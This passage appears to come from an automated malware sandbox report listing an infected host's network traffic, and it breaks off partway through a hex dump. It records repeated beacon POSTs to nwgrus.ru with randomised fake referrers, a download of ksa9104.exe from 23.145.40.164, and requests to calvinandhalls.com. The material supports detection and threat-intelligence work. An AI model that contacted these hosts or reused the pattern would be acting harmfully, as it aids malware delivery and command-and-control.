Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qnssdnlxskerq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vpprwqijyswgyjvy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ayjhmseqvvjye.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 165Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bnqsjigsukajkt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ejrqbeuhiivimsok.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 244Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://yanbtiwxewyyhy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://frpabbqmujgvx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 190Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ybeufjfqrbhah.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://astksdjaitsnxo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 294Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ssdmhljrxull.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 309Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mshenhcpddejse.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pjefvbuybfqlgx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fufaecmkeyed.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://naauncqsbvtxnxe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 299Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lcpcrwvedbvpllck.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 267Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lgertcnwaskqpc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fevqsrdkflt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 242Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://drnpfojnpvggv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ibetbbesaakqkq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 319Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tyqfkmhoepxpii.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wyjfuitjcdhsl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 313Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ecpjrwjcauix.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 215Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bxntarqqdjdvdpxp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://blfmqjnqqyje.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 365Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gieuyuggiqfgtm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://eankyeljcevd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 236Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://luejdvwxxrcvrqdh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 221Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://svfopofgftavf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 294Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bprjpwpsmmrgaa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 313Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ocnxfkuqumobjmad.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 111Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dxdhacbibrdlwrt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nlmsxhroxptelhd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hikneccvvrshgb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: nwgrus.ru

Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164

Source: global traffic	DNS traffic detected: DNS query: nwgrus.ru
Source: global traffic	DNS traffic detected: DNS query: calvinandhalls.com

Source: unknown

HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://mcjvrcrjrartnd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: calvinandhalls.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 13:38:44 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Connection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 13:38:55 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Connection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 13:38:56 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 409Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 13:39:03 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 409Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 13:40:17 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 13:40:37 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 13:40:59 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 13:41:22 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:37:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 86 e4 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:37:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:37:54 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:37:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:37:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:02 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 